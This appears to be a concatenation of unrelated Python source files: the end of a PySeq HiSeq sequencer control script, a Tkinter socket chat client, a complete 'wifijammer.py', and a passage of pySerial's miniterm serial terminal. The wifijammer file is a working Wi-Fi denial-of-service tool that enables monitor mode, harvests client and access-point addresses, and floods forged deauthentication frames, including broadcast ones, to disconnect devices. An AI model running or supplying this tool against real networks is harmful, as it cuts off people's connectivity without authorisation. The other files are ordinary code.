hs.message('PySeq::'+AorB+'::Rinsing flowcell with', port)
fc.thread = threading.Thread(target = hs.v24[AorB].move, args = (port,))
fc.thread.start()
# Pump
port_num = hs.v24[AorB].port_dict[port]
if port_num in hs.v24[AorB].side_ports:
volume = fc.volume['side']
elif port_num == hs.v24[AorB].sample_port:
volume = fc.volume['sample']
else:
volume = fc.volume['main']
speed = fc.pump_speed['reagent']
while fc.thread.is_alive(): # Wait till valve has moved
pass
fc.thread = threading.Thread(target = hs.p[AorB].pump,
args = (volume, speed,))
else:
fc.thread = threading.Thread(target = do_nothing)
##########################################################
## Shut down system ######################################
##########################################################
def do_shutdown():
"""Shutdown the HiSeq and flush all reagent lines if prompted."""
for fc in flowcells.values():
while fc.thread.is_alive():
fc.wait_thread.set()
time.sleep(10)
LED('all', 'startup')
hs.message('PySeq::Shutting down...')
hs.z.move([0, 0, 0])
hs.move_stage_out()
do_flush()
##Flush all lines##
# LED('all', 'user')
#
# # flush_YorN = userYN("Flush lines")
# if flush_YorN:
# hs.message('Lock temporary flowcell on stage')
# hs.message('Place all valve input lines in PBS/water')
# input('Press enter to continue...')
#
# LED('all', 'startup')
# for fc in flowcells.keys():
# volume = flowcells[fc].volume['main']
# speed = flowcells[fc].pump_speed['flush']
# for port in hs.v24[fc].port_dict.keys():
# if isinstance(port_dict[port], int):
# hs.v24[fc].move(port)
# hs.p[fc].pump(volume, speed)
# ##Return pump to top and NO port##
# hs.p[fc].command('OA0R')
# hs.p[fc].command('IR')
# else:
# LED('all', 'user')
hs.message('Retrieve experiment flowcells')
input('Press any key to finish shutting down')
for fc in flowcells.values():
AorB = fc.position
fc_log_path = join(hs.log_path, 'Flowcell'+AorB+'.log')
with open(fc_log_path, 'w') as fc_file:
for i in range(len(fc.history[0])):
fc_file.write(str(fc.history[0][i])+' '+
str(fc.history[1][i])+' '+
str(fc.history[2][i])+'\n')
# Turn off y stage motor
hs.y.move(0)
hs.y.command('OFF')
LED('all', 'off')
##########################################################
## Free Flowcells ########################################
##########################################################
def free_fc():
"""Release the first flowcell if flowcells are waiting on each other."""
# Get which flowcell is to be first
experiment = config['experiment']
cycles = int(experiment.get('first flowcell', fallback = 'A'))
first_fc = experiment.get('first flowcell', fallback = 'A')
if len(flowcells) == 1:
fc = flowcells[[*flowcells][0]]
try:
fc.wait_thread.set()
except:
pass
fc.signal_event = None
else:
flowcells_ = [fc.position for fc in flowcells.values() if fc.total_cycles <= cycles]
if len(flowcells_) == 1:
fc = flowcells_[0]
else:
fc = flowcells[first_fc]
flowcells[fc.waits_for].wait_thread.set()
flowcells[fc.waits_for].signal_event = None
hs.message('PySeq::Flowcells are waiting on each other starting flowcell',
fc.position)
return fc.position
def get_config(args):
"""Return the experiment config appended with the method config.
**Parameters:**
- args (dict): Dictionary with the config path, the experiment name and
the output path to store images and logs.
**Returns:**
- config: The experiment config appended with the method config.
"""
# Create config parser
config = configparser.ConfigParser()
# Defaults that can be overided
config.read_dict({'experiment' : {'log path': 'logs',
'image path': 'images'}
})
# Open config file
if os.path.isfile(args['config']):
config.read(args['config'])
else:
error('ConfigFile::Does not exist')
sys.exit()
# Set output path
config['experiment']['save path'] = args['output']
# Set experiment name
config['experiment']['experiment name'] = args['name']
# save user valve
USERVALVE = False
if config.has_section('reagents'):
valve = config['reagents'].items()
if len(valve) > 0:
USERVALVE = True
# Get method specific configuration
method = config['experiment']['method']
if method in methods.get_methods():
config_path, recipe_path = methods.return_method(method)
config.read(config_path)
elif os.path.isfile(method):
config.read(method)
recipe_path = None
elif config.has_section(method):
recipe_path = None
else:
error('ConfigFile::Error reading method configuration')
sys.exit()
# Check method keys
if not methods.check_settings(config[method]):
go = userYN('Proceed with experiment')
if not go:
sys.exit()
# Get recipe
recipe_name = config[method]['recipe']
if recipe_path is not None:
pass
elif os.path.isfile(recipe_name):
recipe_path = recipe_name
else:
error('ConfigFile::Error reading recipe')
config['experiment']['recipe path'] = recipe_path
# Don't override user defined valve
user_config = configparser.ConfigParser()
user_config.read(args['config'])
if USERVALVE:
config.read_dict({'reagents':dict(user_config['reagents'])})
if user_config.has_section(method):
config.read_dict({method:dict(user_config[method])})
return config
def check_fc_temp(fc):
"""Check temperature of flowcell."""
if fc.temperature is not None:
if fc.temp_timer is None:
fc.temp_timer = threading.Timer(fc.temp_interval, do_nothing)
fc.temp_timer.start()
if not fc.temp_timer.is_alive():
#print('checking temp')
T = hs.T.get_fc_T(fc.position)
hs.message(False, 'PySeq::'+fc.position+'::Temperature::',T,'°C')
fc.temp_timer = None
if abs(fc.temperature - T) > 5:
msg = 'PySeq::'+fc.position+'::WARNING::Set Temperature '
msg += str(fc.temperature) + ' C'
hs.message(msg)
msg = 'PySeq::'+fc.position+'::WARNING::Actual Temperature '
msg += str(T) + ' C'
hs.message(msg)
return T
###################################
## Run System #####################
###################################
args_ = args.get_arguments() # Get config path, experiment name, & output path
if __name__ == 'pyseq.main':
n_errors = 0
config = get_config(args_) # Get config file
logger = setup_logger() # Create logfiles
port_dict = check_ports() # Check ports in configuration file
first_line, IMAG_counter, z_planes = check_instructions() # Checks instruction file is correct and makes sense
flowcells = setup_flowcells(first_line, IMAG_counter) # Create flowcells
hs = configure_instrument(IMAG_counter, port_dict)
confirm_settings(z_planes)
hs = initialize_hs(IMAG_counter) # Initialize HiSeq, takes a few minutes
if n_errors is 0:
flush_YorN = do_flush() # Ask to flush out lines
do_prime(flush_YorN) # Ask to prime lines
if not userYN('Start experiment'):
sys.exit()
# Do prerecipe or Initialize Flowcells
for fc in flowcells.values():
if fc.prerecipe_path:
fc.pre_recipe()
else:
fc.restart_recipe()
cycles_complete = False
while not cycles_complete:
stuck = 0
complete = 0
for fc in flowcells.values():
if not fc.thread.is_alive(): # flowcell not busy, do next step in recipe
do_recipe(fc)
if fc.signal_event: # check if flowcells are waiting on each other
stuck += 1
if fc.cycle > fc.total_cycles: # check if all cycles are complete on flowcell
complete += 1
check_fc_temp(fc)
if stuck == len(flowcells): # Start the first flowcell if they are waiting on each other
free_fc()
if complete == len(flowcells): # Exit while loop
cycles_complete = True
if hs.current_view is not None: # Show latest images in napari, WILL BLOCK
hs.current_view.show()
hs.current_view = None
do_shutdown() # Shutdown HiSeq
else:
error('Total number of errors =', n_errors)
def main():
pass
|
chat_client.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"Tkinter GUI chat client"""
import socket #Biblioteca para socket
import threading #Bibiioteca para manejar hilos.
import Tkinter #biblioteca para GUI
#----Construimos socket----
HOST = input('Host: ')
PORT = input('Port: ')
if not PORT:
PORT = 9999
else:
PORT = int(PORT)
BUFSIZE = 1024
ADDR = (HOST, PORT)
#Nos conectamos al servidor con el metodo connect. Tiene dos parametros
#El primero es la IP del servidor y el segundo el puerto de conexion
#Ya deeclarados en la variable ADDR
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect(ADDR)
def receive():
"""Maneja el recibo de mensajes."""
while True:
try:
# #Recibimos el mensaje, con el metodo recv recibimos datos y como parametro
#la cantidad de bytes para recibir
msg = client_socket.recv(BUFSIZE)
msg_list.insert(Tkinter.END, msg)
except OSError:
break
def send(event = None): # evento lo pasa por binders.
"""Maneja el envio de mensajes."""
msg = my_msg.get()
my_msg.set("") # limpia el cuadro de entrada.
client_socket.send(msg)
if msg == "quit":
#Cerramos la instancia del socket del cliente
client_socket.close()
top.quit()
def on_closing(event = None):
"""Esta funcion se llama cuando se cierra la ventana"""
my_msg.set("quit")
send()
top = Tkinter.Tk()
top.title("Chat Me!")
messages_frame = Tkinter.Frame(top)
my_msg = Tkinter.StringVar() # Para los mensajes que se envian
my_msg.set("Escribe tu mensaje aqui.")
scrollbar = Tkinter.Scrollbar(messages_frame) # Scrollbar
# Esto contendra los mensajes
msg_list = Tkinter.Listbox(messages_frame, height=15, width=50, yscrollcommand=scrollbar.set)
scrollbar.pack(side = Tkinter.RIGHT, fill = Tkinter.Y)
msg_list.pack(side = Tkinter.LEFT, fill = Tkinter.BOTH)
msg_list.pack()
messages_frame.pack()
entry_field = Tkinter.Entry(top, textvariable = my_msg)
entry_field.bind("<Return>", send)
entry_field.pack()
send_button = Tkinter.Button(top, text = "Enviar", command = send)
send_button.pack()
top.protocol("WM_DELETE_WINDOW", on_closing)
#Inicializa el hilo(comienza a correr su funcion objetivo)
receive_thread = threading.Thread(target = receive)
receive_thread.start()
Tkinter.mainloop() # GUI exe.
|
wifijammer.py
|
#!/usr/bin/env python
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) # Shut up Scapy
from scapy.all import *
conf.verb = 0 # Scapy I thought I told you to shut up
import os
import sys
import time
from threading import Thread, Lock
from subprocess import Popen, PIPE
from signal import SIGINT, signal
import argparse
import socket
import struct
import fcntl
# Console colors
W = '\033[0m' # white (normal)
R = '\033[31m' # red
G = '\033[32m' # green
O = '\033[33m' # orange
B = '\033[34m' # blue
P = '\033[35m' # purple
C = '\033[36m' # cyan
GR = '\033[37m' # gray
T = '\033[93m' # tan
def parse_args():
#Create the arguments
parser = argparse.ArgumentParser()
parser.add_argument("-s", "--skip", help="Skip deauthing this MAC address. Example: -s 00:11:BB:33:44:AA")
parser.add_argument("-i", "--interface", help="Choose monitor mode interface. By default script will find the most powerful interface and starts monitor mode on it. Example: -i mon5")
parser.add_argument("-c", "--channel", help="Listen on and deauth only clients on the specified channel. Example: -c 6")
parser.add_argument("-m", "--maximum", help="Choose the maximum number of clients to deauth. List of clients will be emptied and repopulated after hitting the limit. Example: -m 5")
parser.add_argument("-n", "--noupdate", help="Do not clear the deauth list when the maximum (-m) number of client/AP combos is reached. Must be used in conjunction with -m. Example: -m 10 -n", action='store_true')
parser.add_argument("-t", "--timeinterval", help="Choose the time interval between packets being sent. Default is as fast as possible. If you see scapy errors like 'no buffer space' try: -t .00001")
parser.add_argument("-p", "--packets", help="Choose the number of packets to send in each deauth burst. Default value is 1; 1 packet to the client and 1 packet to the AP. Send 2 deauth packets to the client and 2 deauth packets to the AP: -p 2")
parser.add_argument("-d", "--directedonly", help="Skip the deauthentication packets to the broadcast address of the access points and only send them to client/AP pairs", action='store_true')
parser.add_argument("-a", "--accesspoint", help="Enter the MAC address of a specific access point to target")
parser.add_argument("--world", help="N. American standard is 11 channels but the rest of the world it's 13 so this options enables the scanning of 13 channels", action="store_true")
return parser.parse_args()
########################################
# Begin interface info and manipulation
########################################
def get_mon_iface(args):
global monitor_on
monitors, interfaces = iwconfig()
if args.interface:
interface = args.interface
monmode = start_mon_mode(interface)
return monmode
if len(monitors) > 0:
monitor_on = True
return monitors[0]
else:
# Start monitor mode on a wireless interface
print '['+G+'*'+W+'] Finding the most powerful interface...'
interface = get_iface(interfaces)
monmode = start_mon_mode(interface)
return monmode
def iwconfig():
monitors = []
interfaces = {}
try:
proc = Popen(['iwconfig'], stdout=PIPE, stderr=DN)
except OSError:
sys.exit('['+R+'-'+W+'] Could not execute "iwconfig"')
for line in proc.communicate()[0].split('\n'):
if len(line) == 0: continue # Isn't an empty string
if line[0] != ' ': # Doesn't start with space
wired_search = re.search('eth[0-9]|em[0-9]|p[1-9]p[1-9]', line)
if not wired_search: # Isn't wired
iface = line[:line.find(' ')] # is the interface
if 'Mode:Monitor' in line:
monitors.append(iface)
elif 'IEEE 802.11' in line:
if "ESSID:\"" in line:
interfaces[iface] = 1
else:
interfaces[iface] = 0
return monitors, interfaces
def get_iface(interfaces):
scanned_aps = []
if len(interfaces) < 1:
sys.exit('['+R+'-'+W+'] No wireless interfaces found, bring one up and try again')
if len(interfaces) == 1:
for interface in interfaces:
return interface
# Find most powerful interface
for iface in interfaces:
count = 0
proc = Popen(['iwlist', iface, 'scan'], stdout=PIPE, stderr=DN)
for line in proc.communicate()[0].split('\n'):
if ' - Address:' in line: # first line in iwlist scan for a new AP
count += 1
scanned_aps.append((count, iface))
print '['+G+'+'+W+'] Networks discovered by '+G+iface+W+': '+T+str(count)+W
try:
interface = max(scanned_aps)[1]
return interface
except Exception as e:
for iface in interfaces:
interface = iface
print '['+R+'-'+W+'] Minor error:',e
print ' Starting monitor mode on '+G+interface+W
return interface
def start_mon_mode(interface):
print '['+G+'+'+W+'] Starting monitor mode off '+G+interface+W
try:
os.system('ifconfig %s down' % interface)
os.system('iwconfig %s mode monitor' % interface)
os.system('ifconfig %s up' % interface)
return interface
except Exception:
sys.exit('['+R+'-'+W+'] Could not start monitor mode')
def remove_mon_iface(mon_iface):
os.system('ifconfig %s down' % mon_iface)
os.system('iwconfig %s mode managed' % mon_iface)
os.system('ifconfig %s down' % mon_iface)
def mon_mac(mon_iface):
'''
http://stackoverflow.com/questions/159137/getting-mac-address
'''
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', mon_iface[:15]))
mac = ''.join(['%02x:' % ord(char) for char in info[18:24]])[:-1]
print '['+G+'*'+W+'] Monitor mode: '+G+mon_iface+W+' - '+O+mac+W
return mac
########################################
# End of interface info and manipulation
########################################
def channel_hop(mon_iface, args):
'''
First time it runs through the channels it stays on each channel for 5 seconds
in order to populate the deauth list nicely. After that it goes as fast as it can
'''
global monchannel, first_pass
channelNum = 0
maxChan = 12 if not args.world else 14
err = None
while 1:
if args.channel:
with lock:
monchannel = args.channel
else:
channelNum +=1
if channelNum > maxChan:
channelNum = 1
with lock:
first_pass = 0
with lock:
monchannel = str(channelNum)
try:
proc = Popen(['iw', 'dev', mon_iface, 'set', 'channel', monchannel], stdout=DN, stderr=PIPE)
except OSError:
print '['+R+'-'+W+'] Could not execute "iw"'
os.kill(os.getpid(),SIGINT)
sys.exit(1)
for line in proc.communicate()[1].split('\n'):
if len(line) > 2: # iw dev shouldnt display output unless there's an error
err = '['+R+'-'+W+'] Channel hopping failed: '+R+line+W
output(err, monchannel)
if args.channel:
time.sleep(.05)
else:
# For the first channel hop thru, do not deauth
if first_pass == 1:
time.sleep(1)
continue
deauth(monchannel)
def deauth(monchannel):
'''
addr1=destination, addr2=source, addr3=bssid, addr4=bssid of gateway if there's
multi-APs to one gateway. Constantly scans the clients_APs list and
starts a thread to deauth each instance
'''
pkts = []
if len(clients_APs) > 0:
with lock:
for x in clients_APs:
client = x[0]
ap = x[1]
ch = x[2]
# Can't add a RadioTap() layer as the first layer or it's a malformed
# Association request packet?
# Append the packets to a new list so we don't have to hog the lock
# type=0, subtype=12?
if ch == monchannel:
deauth_pkt1 = Dot11(addr1=client, addr2=ap, addr3=ap)/Dot11Deauth()
deauth_pkt2 = Dot11(addr1=ap, addr2=client, addr3=client)/Dot11Deauth()
pkts.append(deauth_pkt1)
pkts.append(deauth_pkt2)
if len(APs) > 0:
if not args.directedonly:
with lock:
for a in APs:
ap = a[0]
ch = a[1]
if ch == monchannel:
deauth_ap = Dot11(addr1='ff:ff:ff:ff:ff:ff', addr2=ap, addr3=ap)/Dot11Deauth()
pkts.append(deauth_ap)
if len(pkts) > 0:
# prevent 'no buffer space' scapy error http://goo.gl/6YuJbI
if not args.timeinterval:
args.timeinterval = 0
if not args.packets:
args.packets = 15
for p in pkts:
send(p, inter=float(args.timeinterval), count=int(args.packets))
def output(err, monchannel):
os.system('clear')
if err:
print err
else:
print '['+G+'+'+W+'] '+mon_iface+' channel: '+G+monchannel+W+'\n'
if len(clients_APs) > 0:
print ' Deauthing ch ESSID'
# Print the deauth list
with lock:
for ca in clients_APs:
if len(ca) > 3:
print '['+T+'*'+W+'] '+O+ca[0]+W+' - '+O+ca[1]+W+' - '+ca[2].ljust(2)+' - '+T+ca[3]+W
else:
print '['+T+'*'+W+'] '+O+ca[0]+W+' - '+O+ca[1]+W+' - '+ca[2]
if len(APs) > 0:
print '\n Access Points ch ESSID'
with lock:
for ap in APs:
print '['+T+'*'+W+'] '+O+ap[0]+W+' - '+ap[1].ljust(2)+' - '+T+ap[2]+W
print ''
def noise_filter(skip, addr1, addr2):
# Broadcast, broadcast, IPv6mcast, spanning tree, spanning tree, multicast, broadcast
ignore = ['ff:ff:ff:ff:ff:ff', '00:00:00:00:00:00', '33:33:00:', '33:33:ff:', '01:80:c2:00:00:00', '01:00:5e:', mon_MAC]
if skip:
ignore.append(skip)
for i in ignore:
if i in addr1 or i in addr2:
return True
def cb(pkt):
'''
Look for dot11 packets that aren't to or from broadcast address,
are type 1 or 2 (control, data), and append the addr1 and addr2
to the list of deauth targets.
'''
global clients_APs, APs
# return these if's keeping clients_APs the same or just reset clients_APs?
# I like the idea of the tool repopulating the variable more
if args.maximum:
if args.noupdate:
if len(clients_APs) > int(args.maximum):
return
else:
if len(clients_APs) > int(args.maximum):
with lock:
clients_APs = []
APs = []
# We're adding the AP and channel to the deauth list at time of creation rather
# than updating on the fly in order to avoid costly for loops that require a lock
if pkt.haslayer(Dot11):
if pkt.addr1 and pkt.addr2:
pkt.addr1 = pkt.addr1.lower()
pkt.addr2 = pkt.addr2.lower()
# Filter out all other APs and clients if asked
if args.accesspoint:
if args.accesspoint not in [pkt.addr1, pkt.addr2]:
return
# Check if it's added to our AP list
if pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeResp):
APs_add(clients_APs, APs, pkt, args.channel, args.world)
# Ignore all the noisy packets like spanning tree
if noise_filter(args.skip, pkt.addr1, pkt.addr2):
return
# Management = 1, data = 2
if pkt.type in [1, 2]:
clients_APs_add(clients_APs, pkt.addr1, pkt.addr2)
def APs_add(clients_APs, APs, pkt, chan_arg, world_arg):
ssid = pkt[Dot11Elt].info
bssid = pkt[Dot11].addr3.lower()
try:
# Thanks to airoscapy for below
ap_channel = str(ord(pkt[Dot11Elt:3].info))
chans = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13'] if not args.world else ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14']
if ap_channel not in chans:
return
if chan_arg:
if ap_channel != chan_arg:
return
except Exception as e:
return
if len(APs) == 0:
with lock:
return APs.append([bssid, ap_channel, ssid])
else:
for b in APs:
if bssid in b[0]:
return
with lock:
return APs.append([bssid, ap_channel, ssid])
def clients_APs_add(clients_APs, addr1, addr2):
if len(clients_APs) == 0:
if len(APs) == 0:
with lock:
return clients_APs.append([addr1, addr2, monchannel])
else:
AP_check(addr1, addr2)
# Append new clients/APs if they're not in the list
else:
for ca in clients_APs:
if addr1 in ca and addr2 in ca:
return
if len(APs) > 0:
return AP_check(addr1, addr2)
else:
with lock:
return clients_APs.append([addr1, addr2, monchannel])
def AP_check(addr1, addr2):
for ap in APs:
if ap[0].lower() in addr1.lower() or ap[0].lower() in addr2.lower():
with lock:
return clients_APs.append([addr1, addr2, ap[1], ap[2]])
def stop(signal, frame):
if monitor_on:
sys.exit('\n['+R+'!'+W+'] Closing')
else:
remove_mon_iface(mon_iface)
os.system('ifconfig %s down')
sys.exit('\n['+R+'!'+W+'] Closing')
if __name__ == "__main__":
if os.geteuid():
sys.exit('['+R+'-'+W+'] Please run as root')
clients_APs = []
APs = []
DN = open(os.devnull, 'w')
lock = Lock()
args = parse_args()
monitor_on = None
mon_iface = get_mon_iface(args)
conf.iface = mon_iface
mon_MAC = mon_mac(mon_iface)
first_pass = 1
# Start channel hopping
hop = Thread(target=channel_hop, args=(mon_iface, args))
hop.daemon = True
hop.start()
signal(SIGINT, stop)
try:
sniff(iface=mon_iface, store=0, prn=cb)
except Exception as msg:
remove_mon_iface(mon_iface)
os.system('ifconfig %s down')
print '\n['+R+'!'+W+'] Closing'
sys.exit(0)
|
miniterm.py
|
#!/usr/bin/env python
#
# Very simple serial terminal
#
# This file is part of pySerial. https://github.com/pyserial/pyserial
# (C)2002-2015 Chris Liechti <cliechti@gmx.net>
#
# SPDX-License-Identifier: BSD-3-Clause
import codecs
import os
import sys
import threading
import serial
from serial.tools.list_ports import comports
from serial.tools import hexlify_codec
# pylint: disable=wrong-import-order,wrong-import-position
codecs.register(lambda c: hexlify_codec.getregentry() if c == 'hexlify' else None)
try:
raw_input
except NameError:
# pylint: disable=redefined-builtin,invalid-name
raw_input = input # in python3 it's "raw"
unichr = chr
def key_description(character):
"""generate a readable description for a key"""
ascii_code = ord(character)
if ascii_code < 32:
return 'Ctrl+{:c}'.format(ord('@') + ascii_code)
else:
return repr(character)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class ConsoleBase(object):
"""OS abstraction for console (input/output codec, no echo)"""
def __init__(self):
if sys.version_info >= (3, 0):
self.byte_output = sys.stdout.buffer
else:
self.byte_output = sys.stdout
self.output = sys.stdout
def setup(self):
"""Set console to read single characters, no echo"""
def cleanup(self):
"""Restore default console settings"""
def getkey(self):
"""Read a single key from the console"""
return None
def write_bytes(self, byte_string):
"""Write bytes (already encoded)"""
self.byte_output.write(byte_string)
self.byte_output.flush()
def write(self, text):
"""Write string"""
self.output.write(text)
self.output.flush()
def cancel(self):
"""Cancel getkey operation"""
# - - - - - - - - - - - - - - - - - - - - - - - -
# context manager:
# switch terminal temporary to normal mode (e.g. to get user input)
def __enter__(self):
self.cleanup()
return self
def __exit__(self, *args, **kwargs):
self.setup()
if os.name == 'nt': # noqa
import msvcrt
import ctypes
class Out(object):
"""file-like wrapper that uses os.write"""
def __init__(self, fd):
self.fd = fd
def flush(self):
pass
def write(self, s):
os.write(self.fd, s)
class Console(ConsoleBase):
def __init__(self):
super(Console, self).__init__()
self._saved_ocp = ctypes.windll.kernel32.GetConsoleOutputCP()
self._saved_icp = ctypes.windll.kernel32.GetConsoleCP()
ctypes.windll.kernel32.SetConsoleOutputCP(65001)
ctypes.windll.kernel32.SetConsoleCP(65001)
self.output = codecs.getwriter('UTF-8')(Out(sys.stdout.fileno()), 'replace')
# the change of the code page is not propagated to Python, manually fix it
sys.stderr = codecs.getwriter('UTF-8')(Out(sys.stderr.fileno()), 'replace')
sys.stdout = self.output
self.output.encoding = 'UTF-8' # needed for input
def __del__(self):
ctypes.windll.kernel32.SetConsoleOutputCP(self._saved_ocp)
ctypes.windll.kernel32.SetConsoleCP(self._saved_icp)
def getkey(self):
while True:
z = msvcrt.getwch()
if z == unichr(13):
return unichr(10)
elif z in (unichr(0), unichr(0x0e)): # functions keys, ignore
msvcrt.getwch()
else:
return z
def cancel(self):
# CancelIo, CancelSynchronousIo do not seem to work when using
# getwch, so instead, send a key to the window with the console
hwnd = ctypes.windll.kernel32.GetConsoleWindow()
ctypes.windll.user32.PostMessageA(hwnd, 0x100, 0x0d, 0)
elif os.name == 'posix':
import atexit
import termios
import fcntl
class Console(ConsoleBase):
def __init__(self):
super(Console, self).__init__()
self.fd = sys.stdin.fileno()
self.old = termios.tcgetattr(self.fd)
atexit.register(self.cleanup)
if sys.version_info < (3, 0):
self.enc_stdin = codecs.getreader(sys.stdin.encoding)(sys.stdin)
else:
self.enc_stdin = sys.stdin
def setup(self):
new = termios.tcgetattr(self.fd)
new[3] = new[3] & ~termios.ICANON & ~termios.ECHO & ~termios.ISIG
new[6][termios.VMIN] = 1
new[6][termios.VTIME] = 0
termios.tcsetattr(self.fd, termios.TCSANOW, new)
def getkey(self):
c = self.enc_stdin.read(1)
if c == unichr(0x7f):
c = unichr(8) # map the BS key (which yields DEL) to backspace
return c
def cancel(self):
fcntl.ioctl(self.fd, termios.TIOCSTI, b'\0')
def cleanup(self):
termios.tcsetattr(self.fd, termios.TCSAFLUSH, self.old)
else:
raise NotImplementedError(
'Sorry no implementation for your platform ({}) available.'.format(sys.platform))
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
class Transform(object):
"""do-nothing: forward all data unchanged"""
def rx(self, text):
"""text received from serial port"""
return text
def tx(self, text):
"""text to be sent to serial port"""
return text
def echo(self, text):
"""text to be sent but displayed on console"""
return text
class CRLF(Transform):
"""ENTER sends CR+LF"""
def tx(self, text):
return text.replace('\n', '\r\n')
class CR(Transform):
"""ENTER sends CR"""
def rx(self, text):
return text.replace('\r', '\n')
def tx(self, text):
return text.replace('\n', '\r')
class LF(Transform):
"""ENTER sends LF"""
class NoTerminal(Transform):
"""remove typical terminal control codes from input"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32) if unichr(x) not in '\r\n\b\t')
REPLACEMENT_MAP.update(
{
0x7F: 0x2421, # DEL
0x9B: 0x2425, # CSI
})
def rx(self, text):
return text.translate(self.REPLACEMENT_MAP)
echo = rx
class NoControls(NoTerminal):
"""Remove all control codes, incl. CR+LF"""
REPLACEMENT_MAP = dict((x, 0x2400 + x) for x in range(32))
REPLACEMENT_MAP.update(
{
0x20: 0x2423, # visual space
0x7F: 0x2421, # DEL
0x9B: 0x2425, # CSI
})
class Printable(Transform):
"""Show decimal code for all non-ASCII characters and replace most control codes"""
def rx(self, text):
r = []
for c in text:
if ' ' <= c < '\x7f' or c in '\r\n\b\t':
r.append(c)
elif c < ' ':
r.append(unichr(0x2400 + ord(c)))
else:
r.extend(unichr(0x2080 + ord(d) - 48) for d in '{:d}'.format(ord(c)))
r.append(' ')
return ''.join(r)
echo = rx
class Colorize(Transform):
"""Apply different colors for received and echo"""
def __init__(self):
# XXX make it configurable, use colorama?
self.input_color = '\x1b[37m'
self.echo_color = '\x1b[31m'
def rx(self, text):
return self.input_color + text
def echo(self, text):
return self.echo_color + text
class DebugIO(Transform):
"""Print what is sent and received"""
def rx(self, text):
sys.stderr.write(' [RX:{}] '.format(repr(text)))
sys.stderr.flush()
return text
def tx(self, text):
sys.stderr.write(' [TX:{}] '.format(repr(text)))
sys.stderr.flush()
return text
# other ideas:
# - add date/time for each newline
# - insert newline after: a) timeout b) packet end character
EOL_TRANSFORMATIONS = {
'crlf': CRLF,
'cr': CR,
'lf': LF,
}
TRANSFORMATIONS = {
'direct': Transform, # no transformation
'default': NoTerminal,
'nocontrol': NoControls,
'printable': Printable,
'colorize': Colorize,
'debug': DebugIO,
}
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
def ask_for_port():
"""\
Show a list of ports and ask the user for a choice. To make selection
easier on systems with long device names, also allow the input of an
index.
"""
sys.stderr.write('\n--- Available ports:\n')
ports = []
for n, (port, desc, hwid) in enumerate(sorted(comports()), 1):
sys.stderr.write('--- {:2}: {:20} {}\n'.format(n, port, desc))
ports.append(port)
while True:
port = raw_input('--- Enter port index or full name: ')
try:
index = int(port) - 1
if not 0 <= index < len(ports):
sys.stderr.write('--- Invalid index!\n')
continue
except ValueError:
pass
else:
port = ports[index]
return port
class Miniterm(object):
"""\
Terminal application. Copy data from serial port to console and vice versa.
Handle special keys from the console to show menu etc.
"""
def __init__(self, serial_instance, echo=False, eol='crlf', filters=()):
self.console = Console()
self.serial = serial_instance
self.echo = echo
self.raw = False
self.input_encoding = 'UTF-8'
self.output_encoding = 'UTF-8'
self.eol = eol
self.filters = filters
self.update_transformations()
self.exit_character = 0x1d # GS/CTRL+]
self.menu_character = 0x14 # Menu: CTRL+T
self.alive = None
self._reader_alive = None
self.receiver_thread = None
self.rx_decoder = None
self.tx_decoder = None
def _start_reader(self):
"""Start reader thread"""
self._reader_alive = True
# start serial->console thread
self.receiver_thread = threading.Thread(target=self.reader, name='rx')
self.receiver_thread.daemon = True
self.receiver_thread.start()
def _stop_reader(self):
"""Stop reader thread only, wait for clean exit of thread"""
self._reader_alive = False
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def start(self):
"""start worker threads"""
self.alive = True
self._start_reader()
# enter console->serial loop
self.transmitter_thread = threading.Thread(target=self.writer, name='tx')
self.transmitter_thread.daemon = True
self.transmitter_thread.start()
self.console.setup()
def stop(self):
"""set flag to stop worker threads"""
self.alive = False
def join(self, transmit_only=False):
"""wait for worker threads to terminate"""
self.transmitter_thread.join()
if not transmit_only:
if hasattr(self.serial, 'cancel_read'):
self.serial.cancel_read()
self.receiver_thread.join()
def close(self):
self.serial.close()
def update_transformations(self):
"""take list of transformation classes and instantiate them for rx and tx"""
transformations = [EOL_TRANSFORMATIONS[self.eol]] + [TRANSFORMATIONS[f]
for f in self.filters]
self.tx_transformations = [t() for t in transformations]
self.rx_transformations = list(reversed(self.tx_transformations))
def set_rx_encoding(self, encoding, errors='replace'):
"""set encoding for received data"""
self.input_encoding = encoding
self.rx_decoder = codecs.getincrementaldecoder(encoding)(errors)
def set_tx_encoding(self, encoding, errors='replace'):
"""set encoding for transmitted data"""
self.output_encoding = encoding
self.tx_encoder = codecs.getincrementalencoder(encoding)(errors)
def dump_port_settings(self):
"""Write current settings to sys.stderr"""
sys.stderr.write("\n--- Settings: {p.name} {p.baudrate},{p.bytesize},{p.parity},{p.stopbits}\n".format(
p=self.serial))
sys.stderr.write('--- RTS: {:8} DTR: {:8} BREAK: {:8}\n'.format(
('active' if self.serial.rts else 'inactive'),
('active' if self.serial.dtr else 'inactive'),
('active' if self.serial.break_condition else 'inactive')))
try:
sys.stderr.write('--- CTS: {:8} DSR: {:8} RI: {:8} CD: {:8}\n'.format(
('active' if self.serial.cts else 'inactive'),
('active' if self.serial.dsr else 'inactive'),
('active' if self.serial.ri else 'inactive'),
('active' if self.serial.cd else 'inactive')))
except serial.SerialException:
# on RFC 2217 ports, it can happen if no modem state notification was
# yet received. ignore this error.
pass
sys.stderr.write('--- software flow control: {}\n'.format('active' if self.serial.xonxoff else 'inactive'))
sys.stderr.write('--- hardware flow control: {}\n'.format('active' if self.serial.rtscts else 'inactive'))
sys.stderr.write('--- serial input encoding: {}\n'.format(self.input_encoding))
sys.stderr.write('--- serial output encoding: {}\n'.format(self.output_encoding))
sys.stderr.write('--- EOL: {}\n'.format(self.eol.upper()))
sys.stderr.write('--- filters: {}\n'.format(' '.join(self.filters)))
def reader(self):
"""loop and copy serial->console"""
try:
while self.alive and self._reader_alive:
# read all that is there or wait for one byte
